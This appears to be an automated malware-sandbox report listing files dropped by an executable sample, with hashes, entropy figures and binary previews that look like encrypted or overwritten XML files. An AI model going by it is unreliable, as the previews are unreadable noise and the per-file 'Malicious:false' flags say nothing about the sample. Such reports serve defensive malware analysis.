&...!.h.....!.L#.......{...[eZ......X.%.'...<.e.w..r.R8..S..%......D...Q._.x.1...PU.>).`VXR.S..bF.{.7...T..u.+5.i.Q.....]?'u.......{..&....E....Y.....e.j...U..}.q...Q......o.,..3.P\....}p+.....&B.#.....M.4.g.7"gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1186
              Entropy (8bit):7.807243782288979
              Encrypted:false
              SSDEEP:24:XF+9Yy/yq59S0E5zfvCYnvBOWLVc0jyds+jhCzXKh2ud+bD:XU9Yy6qrS0GrUWLTjX+NoKB8D
              MD5:C8512D38791B2D66D026AD7DE39E4F28
              SHA1:ADEB1FB9BE647DE307780644AA84DFE4E3741DA2
              SHA-256:5EE49E7122CFEB93063A476413E07245B4D7950E8E66C3F460FF65EB406E9215
              SHA-512:B46077F88A1739BFB34B9F27C523249914EA0B39463AE0C81BD18ADF343CDF706775BABACD45A2B0A1F67E244BFC0C1A72B929B3EEF4168CBB5C427DB50833F7
              Malicious:false
              Preview:<?xml...G.......i..&....."...DT..i.z.I..o..\IuK..n...$.:.w7.. .....6/..;....o..K/..".X..^..\....5y.t2.._.9'............y.:..&.X..Qk...Iek.Te...y2.....I.ed-1t..WZ...P"...0...$}.Hq..m......F.>.1A........a..T..@.......]./.|Vw.'5o.RC.3..N..;.0..1Jp.S}.r?...M.q......y..7.*..1f!S.4.V..$.D.....'.}.....-[`...5...j..`fy.W7..p.....#y.<..V-..........}...#....L1!V..QXj.?..5k...d.5.D>D.-v.w.3L..+#.*..U.`....7.....tB.Ywv....p.j..5{o....Q..eJ..S.....[......cN-..Ae..!W46.O5UaIH..dH5...G[.&...YC..%r(*g.~^.).6=D[l7.i....?!bB-j..7:2$2.a.......}........s8P.....e.o.-r...E... .5..M...p....-\.....n..a#H...H.=$.1.~.U2...M....f......\r..)..7d..VTdF..l.#......x........Y.$PW]q{..:...RL.......:.b..f.^...p{...)^k.D...h..0>h*......-.....u..I..J.."...E..d....r..J.].j9!gu.....I.C.E.M%....$......T.6.0._z..k...T.@.I...\.Q.o..F:..........E.../r.<F.6... .1..S...[o....9......v..p.......L..V..V$.7..j..F.&.....y\.sp.!.re ..N..[}d....P....R.vl/...&...1Oi
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1291
              Entropy (8bit):7.845136418716571
              Encrypted:false
              SSDEEP:24:U05LRTYmoP7n/HVrGF5K8tXFT8o6zuiYX8rf0L86TbXgE5CJBd+bD:UW9Y17vdGF5KsdnpiYXMsI6HgE508D
              MD5:A6BBDBB7A89D2DC1D0D658CA872F80E0
              SHA1:6506857B6FA8D12215AF1B8E1BB6CEE34FD35487
              SHA-256:8B450C78328A5E499BBC0D9BAAEE27E56072570FB12DB29865BE7563CCC19714
              SHA-512:19D2F87B64002FAAFB251D6590BACD5A31A29CC44B444B0128B764DFEBA86540B7CC921D765C839C5F9B32B20F6FDE81B49233AB240F7C6902A09514A7D10E8F
              Malicious:false
              Preview:<?xml4c7T.%`..+...4.Ra.N|.-.._...+d.@z.J^..y.........:jA..........AR.YbpKx......6...6.. j..nL4.ca.:.C.....".h.........lV..) T..IB..h..D-y..D....&S.l..h{;..{..J...3.B.I..#...|...N3'.l.A&.e{.mk2.....o....-\3.j...o...;*zUML.....yS1........v3..u?=L(...i.. .rO.i.. ..)....K......6.....N.`>.`......n.s'...v.EG...'Fd..k..$..f....q.......(...5. .a./.o..2...+..x.#...j../.ga...e.)(z..h.W......N./>.x.(.......~..Q..A...#...-..3...j$.0"X.4..e.8!..S7h4...E.4. .wQ..(uJ.s....D..C@....:q7.z..0q8a..~&.....M.....W.......c....1O.*..m.N.Nm..m<.1..,..7.|...k.@'..fO..3....k.(.a.a.4.....B'.:..O.|..{.#.....\G`\D.V..9..q...7..+..7r.d`....!.{s../...1zUB....X...P'..ml....bt..q....z'..(^.H9I.......Ag4*'...V.q;%.U.J~.Fa'n..-..4:.<.5.}_..f..........}|..J..b......l0.m.O4...[.....)...Rc..]..&r............./..S.......&..........rWE"?.wyJ........P$aY.j.....7..t/..p..j...V.a..3Z...j.(../gT..{@...L...hS..y_(..;.\..1...`..l.............q..k.r...s4...6......|9.....,.K.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1737
              Entropy (8bit):7.869092141748205
              Encrypted:false
              SSDEEP:48:EwZBJnbYxj0Eu6b3X7GekG385gatPBR8D:EwZBtYp0c3X7GekG385geO
              MD5:2C290F5F91304E887C5CE9F60765B545
              SHA1:BEA3DA01C867E7A9CC52C712A4C7094EDF00349D
              SHA-256:4AD8A47802B9787BFB2A91915884C583100EF7B2F885D5FBED6F58BD390D349D
              SHA-512:FBF38F67348BEC2182D720D641257A9BA8D18E5B94BD6E578A3550972B15BD42CB6C3AF58D8643E96889BE6BF1F78A1B14720C8EA466A1CAF8F415390F4D9365
              Malicious:false
              Preview:<?xml0!kc...3..n..f|G*X4.O.#U...,|]....G....Zt...=Z.....}..8.?....A..........[a...f.W.....$...q<)..t.6.h.P...PR]...^b..j.Q......z.VO..P..=..R..=X].;<Q.. @...O.wY...4.....:..#..)C.{cE.3MTJ.P.../..4).......#.i...j.s.9e'.....kr.......0...v...:d.8-........Z....'.V.H.HS.f...15..4.8.(.0.?TZ..%..6....f.(.7....q...d..W.S.$o..=.;3P.91....C..].}...o...........j.(o..........L...m.'.....NA...9...{...se..PrL.S...QZ...P-.&Xa=.(.H.?s..5.....u.....A.C6..f.\.]9..w.;...vjT.@.)...=...Eh@pvK....;....^...L......A.,Q.R|....p....% ....v..X....3.)......d.?l.....(....p...G......&.:[...[...XZh7..6"....y|.}. .X...4G......g<%OH..XKPI....G..Q.{]..F..........5I.....n.3H..a7P$Z.pG.....R.......n.l>.`.R.....*...S@..o.....R/...5.....Jd ..5..H...u..2.. ..y.TN.H.4.Lbn........L..iK....?_7q...@.d.7S-...9)O..g%...MO...Dm.8...w.E..i.....V...5|...c.]G../.^...<Nr...0T.T.=au.6..7....M.... .;.z.....wz=|;Q.!f...{)....W../.....?..~j7.......$.(n.l6....i.T....^...(.D*....4._.s.a-U.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1354
              Entropy (8bit):7.844430477547261
              Encrypted:false
              SSDEEP:24:WFK/+Rigv2y6n2NPanlFFWR+fySn97zctVgtlQbfTWhhX5CUFXjpd+bD:D/wigv+n2RalFtqSnut+lQHWDpCUFTz4
              MD5:E76E74239B4D658954774B4DF79E80E4
              SHA1:A99964A63B17196E778704C4066F941DBF08CCF3
              SHA-256:427C057D46E89BAF87803E313E7C19C660ECA0ED3E6C54C0D6D6F385BCAE14C1
              SHA-512:7DF350A69DA2F9EE115A8210A31C5549DF760EC458FF80BF64A9BC7322FA8D31158400B0D602A3FEE8E029EA6C3A2E7D6C24B81A612C6C77BEBC978A2A85155C
              Malicious:false
              Preview:<?xmlq`1-.._..(v..T..n..j.&2..4'.'c..?.p,.3G..+.` .Z.l.-.......s8..x....~(S......'..?i....dv...".L...72:.m...C...a..=.3.t7m...x}.5.Ba.z.\|/96)./.....L.(.:..R.s.b..y$.q.U...;.i...!|\...-..`D..|P.M#L.....*..F..).H...._..T..a.W..L....Q-.....5F..\...!...&_......|.#.N..^Q...q.F*F...#..B.\..g.:.B,..C...i.Sf..u.U ..8"...1......riH.$..|.[...G....Kq..q(JN6.....WsTK...Z.x.X.d{...K..Q+.4&:.F.8^./D.j....u...r.%#.l..l..&.S.........0..R..cA.&<.C~..8...$F.U.2..L.......O.[..a......?P.'}..,.j..oE"..!Z.oI...&M!%...k[....dj...1P....:...=I.w...OG....i. ..\.y..cm..62......}.h...f.T.$....I$.B....;|k...#D.$... ....@'.B].w#..7.ql.R"}k....9...8.-..Q.".kS#.0...s......M..Pr.r1;W|).v....@..!. ..6.M....JN.?%.-......C@.mS..}.WK.N|.O*..%....o~.M*.t....nZD..R.>ge...~g...YPU.\..u.l-{4.$..:Z.C..n..nXF.......Y....../Z!..xa#.:.?L...1.$d....,..Dcr......Z....n..H..[...1...X..}...M..m24......).MsW'j...,......B..P...f.Y..d..U..>r)L]..&...V. ..=4...iMpe&.o6..+...J..*......9..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1864
              Entropy (8bit):7.8963660234134885
              Encrypted:false
              SSDEEP:48:N3bIAWcUySYYX7ZV8gRRQ8GxpjXuIqG+SOtkh8wWGQOX78D:lbIAWcZSYYX7ZVxw1ZItPwSOXE
              MD5:8024ACCC95BAC2BDAB5AB385E1D1067A
              SHA1:8FDECB5F2F44EC2602056E0DC2E3BF370CF804CE
              SHA-256:3B3CE66FD1D8F4C138AE07102F82705CBACC22D158D2F34E0353A95114B3EE6C
              SHA-512:C755A8105E45F95E24C7FC1EDA912123F555A365FB147E0167A1843A35E051ED8B10364412067EC7063F37E3ECE575D01AB6F25E1E202A4AE4CCA9A886D4030E
              Malicious:false
              Preview:<?xml......F.EPD._#.e.-..#....>...s-.l^`..Y.........-.x.it.........(f{.....Tso.'.P.d^.R..8..dU...xw.cS.[.:#....E.#"C. O.t_.|.....O..z.7..wZW\g.Du.-?..'W;.ePki.,.4./)...b......c...' V.......Y...........u...K ..{.....B....y$......S...iV.W<...e.7..4..;s..S#.VX.....s<.....xH...9Np@..Y....(..mV?>+.-+...;%'u.(L.(S..2.....bcf..D.v..........?..I...,.J.4.gg.4(.n.?.U0L.7..B.wE8.N...!..pIY1........+.%.a....b..94..s.C.*TN.........;v..%.....d=O..I.W....+..V.X......$d..\.*.E.Y.......6.`..J.....Q_Ro......5".{..q".xr...u.-Z..[..j-....Y\..u.:|...@......`.O.-....4C...ay...y.Z.!..(K.........r......5EP-%....:......]....I.......8...dJe.*}.<o....q..\7.;N.v...'D...fE...u....2(....V.(.Y....(......>9...8E.!GX..P.Y..z..a........|.u...h...8R8..WJ..v.p..J$...T*[..i..E&3.S&.;...h.a.i...hk!.....Sx....,O...uu..Z..-iyf.}..|.5..c...uV..]&^*......;/i..Cs.Q.....&.......8y2..4.,.O.KS..x....~.-...-Q...%K.f.....8..).*@...#dm....5.:q.... ..%..?.[L../0GcM....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1509
              Entropy (8bit):7.868305570147842
              Encrypted:false
              SSDEEP:24:X0WOJnsdSdRbzLugJ/EoJKNTLXlkv/EDjkDDHNkVli+8/NRo5WZ06GG2nDn1T3Ep:kBJnqSzpVEoJKN7k/EcDtyJ8/N9GG2nU
              MD5:E2A45555EBB689FAF6A0D7F5F1C1C2D0
              SHA1:3900D2B6E8512CC6BE1EF8D626B66C00A8B70691
              SHA-256:6804C84B276E02C39C9AB9B56E94701FA087C8F21BFEE8F189A1340009FFC0D3
              SHA-512:DBA66D6FBEE6F5065F86ED369ED107916645B9C28B608E25E8F5FDF74C9864EFCC8D95737DE79FC37FD21D35A8E8ACAD0CAFAEAEE5CCD7FC8B1F3C52ED043F82
              Malicious:false
              Preview:<?xmlYH.P....9|..........N_.EA...'....B1..86a.|>...h....r...D.....H..l@.N.wC.@...Y.<..]W=....H...um.^...5.....&..,.(..7dz...t.W.Q.....3.*..y>...^s..+..C..).D'..G..S...U....J.0..P...q.T.[Nq{..A.6@A.A.a%..p.6.E.....W..U............)..lF.9...1......UM..t.O.,..G.v.......h.b.:..>.K....$6.y_...5....^r.=...E..[$x..E..R[...3...w.t.O.^.7.H.....T.@.B.>.=.J{'.[.v.....h.I)_K%.x72.(....L......u..HF_.H....z..u.^..&.m.\....3.HKz'..k..w..l;.WHs..W3e...dTZ.n....h.{.8..H^.T%.N..).j.qa.j..j.Q.../.!m....7..Fp....U9....)...~.y...?`.K...7.D$~,.80..BJod..v.4h..s.......t..y3x.^../M.J..iga.k!.v}..V?.eb....r.c..m.......e.....q....3U.`...+....y..G.@."....=.P=d...Z.e..k..S....*..^..IG...{^..],.x..........-.\.A?i...W... 4@....q.....0#]...V.\..].o...&..."`..Y@.u...Y..U..........q.=.....R.B ..A.b.X.y.....1u....J.1CB..$Y..+<go...Y..Uu...q.^..f.G.b.*...cwe...G.o.r%..5_..#..!..\.@.......:..I.\..Z...=b./.=.rlQt5..!.F^.C.eL.... ..tE.D..!f...;.}T]..Z.R......?zN...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2007
              Entropy (8bit):7.902621548246367
              Encrypted:false
              SSDEEP:48:wpGtM5fykRwn6v8v6nf9RBhAy2NhWosRXlHZ6VFA5ruC2hs8D:t+yL6v8v6nfH6NkosNl56V69Z2hR
              MD5:F20CA08090135C30ED500CFF91A16A85
              SHA1:C3A0B5CFCC2B3DCCFF4142EBC772B71B6B668271
              SHA-256:9D544D7536C1DDBDA4CF4EF6DEE318DF5824AC721D6EA7BD478AC86414730356
              SHA-512:50842198611E1DCC6BCCD6A9AA501E779B7DB12E3FFCB39C19D5EABB786D247732FBD3047E417174D9FC41E07AECC50313666AAF157A15D00006B52FE8D7BB6F
              Malicious:false
              Preview:<?xmlZ...r.O....~...w......h.;p....y%@n......3..m/..p.z.N.N).WQS...d$..7..G5..Le.se.e,..1&..O...o.<p=.$..,*..U..3...m..}m.....\..BnC..s.(.@;j\..'0...AJ."......d.)D.....A...}.Z..d.........!k.+.X..|aB...f...h.T.}z..p.M.K.u.ffUN..~'e...(.*#D..Wg.9.....v..de.&0...#.....j....vp..+.7..@..........Z+....O..m0...v{+.......K.8E......7.y.rwf...c.J..>.....#..{..y.{..q..x.G..."..=4...8.fo.._..C.B..eg.../..'!.E....:G... }Q+9Rj.-..W.^P.G.`z.F..(X..!.aZ.V._..\....[.R.9..l6uW...Q....~..c.D....RPy.mR.b1..7k..I/.zK...}Z.C.[....F....f.........+.H.0...w^.5n.&..$W.L".&?b..b)..".....f..""..sX_...6t...VX}v...txD.a*..*K...<.7..?.....U...~..T..w....=A...8.u.w.]8..:..N...p*.[...3.i.t.I...s.......{;.*...b.D$..#&5..W....._...`...t.;.6.JU...|wk]{......?.{,[.B..._.q).n*.+.4.......D.0..Q;.>Q..yX..t..QP...v.vg...ES....V...X...w1.z.....7.;.!..C-b2.l+ ...c;UH.....+pG.DB$;0D...wf..+.......i..O.w@mB..d]O..9..|........i...l......".........-./...T..Pbm....6...:..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1276
              Entropy (8bit):7.8391319085085165
              Encrypted:false
              SSDEEP:24:SsBs86Jf/VSx7b5ZwRjDehrto0bt5jqns81tpHqG5bY6IFGlq5kxu+LeN7jXUoey:SOs8udathxooXjqs8Xpf5pIEnMYoQ8D
              MD5:4319F3EEBCDF6AD60529708F94F7F00C
              SHA1:2DB97A59025E6D317F068BF388B9137CDB4FA1EE
              SHA-256:1340118DA2C547005FDA27A4E25F0637EB372C744DA8A775B68A6BDA11708870
              SHA-512:0424A36ECE6E4594E80F7D42FC29BCAF60007633069F218B798A0128D07EA6EBCAF59529B935545F163EA716611CFC9E934FAF0066AE29845FA3412A323D3F29
              Malicious:false
              Preview:<?xml.T..1X.c.#.,.V.b..pr...m...W.D..$!D6....`..N.D^..{..#.....WF#A..@.xq].^..!...YhY.F.b..;..r..K0.g.zG.N..e.M..J...x..yQ......+....^..HJ..:.....r..U1..M.........s...Rft.,....%...H.1..{.$.=.W...j..X.h...&...%s.]..c6.....rP*...(.6@#6FJk!O7.>..J..}....1.UI.O......h..P..:.....G....)..bF3. z-. ...S6L.r.....}..W.0e.d...q.1C.5pe..K....A*..S"'~(..wE...|..*..........#....."/...`.([(T..6Rd.....=..Dn..&....]P......;.Q.n<...d..=s..n.9_....).._..!..~...<N.)..Y..F.%Q.!...09(..h..m.@.G..^-uH..cxDu....n.n...N..y7>.X..0....JNP..QJ.d....%.\0d...I{O......q.#KW.G..-........!...N........H.y...iT...=..N..<1..U.({](~(E.....zE.....g...6V9.A].x.QJ....9..W.Lo_Y.m<.6B=..E..JXu.'!?"..:.e....T.V.;z.SY.........=...RUB8.J.....dGR..s.E.kV".z*.P.;..U""j..c.6....A.H....F%6..q..W..%.N#..Ig[x9w....V..7...NG.:...N.Y.K..'.'....n.&@.$.........|..u.H......2.....M6.{...WS.......p.C.8q..J....}X../..Q'.I-..M...m?.d.Q.2......eJI...O....c..A..nh0..}....c.F....p-FgX......^&.-,#a..,.9`w...;\.&.s
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2037
              Entropy (8bit):7.901218800567906
              Encrypted:false
              SSDEEP:24:PzisCbZIX+1RPTPa8DX+UIWchwWyBExzXC+2rFCoc2e3yriUNEHOR6VprCPUaXv7:PA1JbDXGwWy4XF2Uo0y2vkZ/ibes8D
              MD5:54F4581666AB2F37CD4B1736BE753571
              SHA1:0F026AB04B8973DCD9BCF6DDA6FFF397C04830A8
              SHA-256:0AEF17B9E8C657CFD9483F411540ABAC3BCF9F9403ABCB65579DD286610F0ED0
              SHA-512:938511D62DBF4537F3BC9403D9D61FF93C65002F27EC4752C200C4DABCEF36E1B0F4ED39035C63805E8BC4BF92F4D2B9E34222BC9A80C257ED18CFD63961532D
              Malicious:false
              Preview:<?xml.(..>..0..%'V!d#..p..^I..I.\....sGfaLjA..(.GPt......pd>H.)m.. ..G.S...8...5.B....}..R.....k.......?.S....r.[n..[.HZ....A.......f.3#7g..!....}M....\...M.....N\.Cd....$.WY..C.N.No.S...V....2...*..........+.>..^....2o1.....X... .2....A9.B..a_e..EW..1...........^.1,.`C..P...h.. (..o8...r,.!..<(.$B......^.E.}....7N.p.@|.iO.....#.KI.I.......\....|..1.B-s....z..p.kSc69w...P.n.]e.....e.......h.B.T.*..."X=..(..Y.|..1.,6. ^..|.C./.\.=Y..s......r...}.\@.&..N6....<..rU.4E........*.Tj...+."...vF....X&.E `a.|c=.3:a....v.Z.4t.K.sR...8.....{M.?.^.......?pZ].}aT..n....(['Mm....~..X..s.5A.bI'"a..A.._Z.2o"..I..".}....[[......g%=\f.j$.....A..h..uY.?./6.."{.^.J..C....M*..7..R.a.T..6..Q....p.+w....9..]W3.Z.L.*...&.JlA..v !......\2....=Q. ..=.4.....mb.W_..(X|u{..~.~.*"0.N....|........j......A.h....4}q...7^...K>..@..n.:.)..F.@.L.....^.1......j.{...7{I=.\..E...W..N._Y.4...3{Q...l2...A..y......{z..tr....TH..tV.x.i.6.$.>....{8........n..1w7ES%.aY..3xp......4.YL.A`E
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1180
              Entropy (8bit):7.83564379734697
              Encrypted:false
              SSDEEP:24:IKQvEQejPlWpYdUVbd7rE9fityVOV7blAIKd+bD:ASjPlJylrpA0VlAF8D
              MD5:87F0CE6470D6E494F4EE6314F5987938
              SHA1:2BE539C787DA63707CF39816483622546A07595D
              SHA-256:70B5173E308034264DF25319168A17CAECA489672516B18E38AF75E6E71D7B3A
              SHA-512:05B022AE1BA29943351F0247CD4CC037684A6AACF31C97A0C969C22C043D8458996937502ADE01F18D9CC970AEC4405BBAF4C40785F87C82E7F42E2123A288D9
              Malicious:false
              Preview:<?xml."..7..K..+...k.|X.........PH6}.EGf.,....S.#..85...*z...'..|..e....J.H.T.*......f..\..O.L.t.y.._...M..NM^T.a.PmV1..6...~j.uB.....$.-."pN..\.w..d._.<...m.>...4.?X.#..].>...U.>.{.Z.......A......a9p..u..+x.\}*..k.x}...*..;...'...=...kep7\~H.......MX.U..=...i.dpr..=).]..hp....#n.v[..mx....jr..w3.my..5F.....dN..o.....1...4j.)Ui:..z...~..b..../.......9w*.U...p.8........r{..J....2....*v....I.R....6.9%m.....=@}...7....../..O.I.........9h...ntX.]..(....S..G.m.w}..5AZ.N.Z.F......Z....!.#.g$..b(..?E..I.P2....C...[.r.........P.....Z.U. m.h$C..R.....=s....2O....1tJ."..).A.n.b.......t..s....mS...'?...v|^S$.....'....}..e.8.3.X.!.n.n%...d'.X)..(...E....x.N...R]..bf]R]~..U0......:.'3....../>!.-..x.../.X[.+.......fo....-..}n.......\.P.v:...XA....?.0..#.8.....F*|.s.'z... ....]...^.O..Y?<.(.M.:2w.V%..?[.....SJR.9.6S04....!F...60-.0.s6...?.*..w.O...v..(.5.&...r1.sH8..h0.....^i........?S9,..L9(.5f@@.`....`..5.2%uom.4.....#."~5...{.).J..YG.q..3...//.5.4c..<.......@..~
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):899
              Entropy (8bit):7.722434310696418
              Encrypted:false
              SSDEEP:24:ewq65+tOJaUTBlGoIITlcEQ8omLm9ZPS8TIowZ5Xd+bD:IC+MjlGoNTl9jomLmnSLoeN8D
              MD5:F654E10E25E2FAC95046846C3D41AD97
              SHA1:125589AD6CD76D89B3A8091E87CAE13B6C5A363A
              SHA-256:25036EEAF8149B84157041243F08D09D143F1336BA4CB59E5276976E72914575
              SHA-512:76C2C5ABEA1661BCABCD0B638B41647D9AD5A25A28EB6E756527232B5924756DDF5F2F6A51A9376214A1EF01D5559C2F5EF94ED6E43DEB310BF7F5D6437B9EBD
              Malicious:false
              Preview:<?xml...$.i...$7~.\4<4].+5m.6...12.GGJ..@...G70.G.4E.G...2......;..w.R.GM.Hb=6.8.....-.z..S..Mc.hZ^.Y,...}b;.<.4..?&.N.X.NM.....n...u.".A.i.B:.../.v!&>t$)9..8..j..$z.<y`..SC.i..+.O)=..F..a.....!..4-...^*...L._}..T..3UQH...8.\}~..n....X..7C...JQ...o..~f...d..z.4D.a..i{@..$w..Aca.S.O..ba.....v8nJh...(.i..t....Q3...U........y#9S+_.'..b.]#.Y...6C.Gw.?.n%..I.>G.4.A.z9T.L.8%..oTrn...8H.>f....h.q...sd.T...{1.gS.C.zD.z.....A.Oe......}M%.S.Q!..2g.d...K.........#)B.'=h......!....LN.......i'.M.O.}z.UH....k...6.....0|.y..C...M.C~Z.. .....\..F.....A.o..}#}E6R...Hc.......K..%..M|...........m.k...#(...NF....-.'.%.a../..W..8.AK:..wMW..i.O.........V.....<.Y..'W....W.$l..3C.*.<....x.....)9.ySU.iI.%p.n...+.....sei..K..PW.bQ...ie..ts1R..Ue3ok&`6..._2...x...0t....S ..1;.v..X.b.d-..g....E..A.4!.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2224
              Entropy (8bit):7.907289179198329
              Encrypted:false
              SSDEEP:48:+a0vTOlX7SCg7GtEEngvnncIsPj9gMQL6EKXlsUs8D:+a66lLSC2scnnYL9gMQ2xsUR
              MD5:899619F4B3AD150D1D5CCAD40FA3D388
              SHA1:A02082E8EE71221A3842A547D06D0A5FFC53DB06
              SHA-256:7E51B65AA614F89B6484461D759593B58AFECDDC9B9F0181AA8B890DADECEA14
              SHA-512:EC280C3C651035FAD709963B99BE2C1493F4B20A8C9A4C285F53E8CC46AA74D4F2D21C16CB563AE8634B976B34A2DED1B4AA7084872751B304109E9593A20844
              Malicious:false
              Preview:<?xml......v....%.....!.ve4x^.@.......^e.D...O..c9..D{..O...=.v.D..B..91.#......A0.@.....?....4..5;.H('.:....f.a[...NM...q>?..N...{..%/X...`5}[....}._E...[.?.....O....dI8^3.f.$9.C..~{N.>u$a.X.:.X.....0.j...p...N..12...:=.%....EaP.`........uTH5X..%..cX..z6..037hi.V.."k.......:...Ap...V.<..pe...+Z.I...).%iW.p-....`..AjB.D.8..........i.)._Pp<d........D.mL&...k...d:...>.....^.?.J.&.9~..1.2.O..%....%.t....YR.y...1...WFp..$M.X.%.4..S`..ef...y?..j.v.IW.ZSCL.&l.5x..W.2..!.....c.,|..G..<.5.mC..8...+.?.cuMy..&.....v.....E6TX_.^.i.\....Z.../oa_....5...ES..T..6..P...P,...,g.QSD..M..'!H...q...s}z.........R....T..........NJD.Y..J1QL.7.;.....r....l& .......j.MM.1..BP.E....QL..wI.'E.t.5.R6,Y.gJ.j...R...m=..1\...~......iHnx..K.....F.r?........j5.1.{.}..Z.-.?4..f....N.%0.6.^..Q..A.Z...u..[.m!..l.+.L.y..'F.j."..Y...`B...X. S.V4.P'^.s.}..q..|R'.W..H.~..F.N......Q.....%.....`.Z+..[]is._.q..}.[.$..b*.hpI^xi.A..{..p...K[S. .......~..i..........Q'.,..-...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1560
              Entropy (8bit):7.874934714696527
              Encrypted:false
              SSDEEP:24:hZSa1kpw5u+/i6MColzoxFqMJNE2h0WbaRJ6NsNCo7TQrB7NEJGjpcmRTVAmvyiZ:DK3+JYUquxb8Tg7ecpcXmvyib2nh8D
              MD5:B997A99824072F2DEF4136C4D84BDBDF
              SHA1:FF42224EC75EB8F0778008C69C52F3E1810B6039
              SHA-256:83DD6E445CE7907B39C0C5ADB34CB1D5129EFFF8ABB32E0B198539C65E20CDA1
              SHA-512:93307DF4C6439D9C52CBE005DEABBC9DF8099537E02E2D8F1D5659698460CA35B543A038C361DC82C82D52A18A4A79B9FE969D28A01261FE372585B3B7071D94
              Malicious:false
              Preview:<?xml.......#...,g.l......:.*fZ%...0n....a~.Gx/*....C...8..l..lo!...bLu..t@....QN.h.{....g....:......Qbx......}y.9...C.../.g.-.@<YH.e.h;k}.p..(.&H..p.=9.u>{s.|h.....!........... ..Fb.|.......V......y.....:*..../&.`...=@6....0..].\H..r]...}3...|uW...C....?..c>.....]..ql...8m-..Y.)....4uW._g$WuH.x.~..h5..u..t.K~:m1.c.i..{R..N..~.Q.6..3.O..e.."..p..e.Q.r..`..Ak..H-RY#.%G......l.n.J.."H.&w/KY..........B.....oB.k...D'.<.B..E..zJ....... .V...&|.....t!.....W!.V.@s....'.......l....,..P...9.......9\f.#M....A...[.8.I..e..+.&..z...en.;..W._....v...l...`Xm.?.[.W.^b....UnXz..W. !..$.;c.o.....?.F....7.TY..N_..T......3w_.Xh8..\u^...7.....i....K0s......8D.,.2..."*..^u.)Q.cE?......./.....-5.4....N..c#...._...a.6.A]h.`.i.2+Q..$..4..8.3..b]..k..;..H2.....%..j.6.......D..V.%..?.....r7''...-..?=.a...uG.E.u..#j.......T?.(p....%..p.g<.D|i.......<..=. .;.k..oD....q..R....i.x...B...+....ny........2a.I...D>.vK.1...o.V#&wv...........B.%..dsk....rn.G_..w).v+.....0
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1206
              Entropy (8bit):7.806644585008921
              Encrypted:false
              SSDEEP:24:WlqBhPmaA1XC7WWY4u3Xxgk4dotVsTnzz/cwud+JvLSW4PWeKd+bD:WlV1yqyunxgkTtSPz0wkSuees8D
              MD5:CDD0B6396D2D9378C4DB9DDAC5143B51
              SHA1:662A2EE48CC66767144304D67EBDA6867B48B566
              SHA-256:F0D3C6B6C9DD191EE3A51AAC1DE0AEB8D20CFC3772E3744E2B19EA930D160D49
              SHA-512:D8BB440328ADE60F4B2949E88374A5B52E96D9AEFDE80280930449AB0D9A079515C8424A1CC429133931DC4B1C160A8F28D9125C6E1EE6B0D8D7ECBAA61C8683
              Malicious:false
              Preview:<?xml....&.4r.M.b.....<O9.qhN......c....6E..I........$<h..bCQ#..{^%.V.Vu...v.u.o...\A...?.........H..d..Vx3->A9xh...=.i...F+.L...Jqz'6...s.f[.o.WE..n....Q+...:+N.2.a....T.......=Q..~..I.G.mP....'6?........l.Z.x.H..j..FJ................IDNd..........Q.2..h..%..B.O...-r.m....n.1...-.J6....9.s.L/.....z......1...Kg...0.F....g0=..\g..)...:F...)..,.`IQ.....59.D".oM........L..~;.....7(Y..i.f..x[`.6.|.HD.......vm..=...8..@..1".rih.sX.o.K......F+.3:...k..#.4..s...(..7E...^.r5..,.).Z.......D.B..ihI.Q..,..o.A.....-...MK3.B..^D.V..+_..9.q....W.....7..4.P...#..:.V.c.NgS.rx....O.....F.1Je..H.'~o..wy...g.....d.F}..}.)..]#.1.......h...>..5.H......h...7c....M........d..;..x.O.. ..:.(..Zk....4.b.}..x......Z{.~Fy......xC.]....~....Ee....g..,........~0..r....2Ka.'.....QU]$.....N.[...Y4..5...1...6.d..|.A)t..5CO.k.`obl..5iX&T.cyx.Z".:.5.'.F.J(..O.4#..&1#`.!y]#.*...o.J.H.......Ub..:....]}..U../..Qd.h.%a.....^..fU.]Fh...Ae%..hu.\..'....:..+mf.Mm...7.D.m..G......z.".
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):738
              Entropy (8bit):7.67995046333628
              Encrypted:false
              SSDEEP:12:3tj+ZSsHZVSJRF+m5vx+celidxj94QMgXAFaoDlkAUYlU8WwtlRnF4qApbK4xAjR:9CSmZoankN9tX6D+QS8WYlRnF4qApbKN
              MD5:0CD70379D534526E73BDC2A0A2030797
              SHA1:7D81EB792912CFC0502B4891E5C82ECE34D1639D
              SHA-256:F471863406777C83E978480F6E24DD2C1DBBC1C4013F70AFBAB110B52073D0DF
              SHA-512:A602E040F31FF8A017FA8AD088425D1A418DE5A6F0193931B289E827AF1B19E026D0E884866E56DEDEC7043E6C121143E45C1B1EA48E2294F82D7F279AF58D17
              Malicious:false
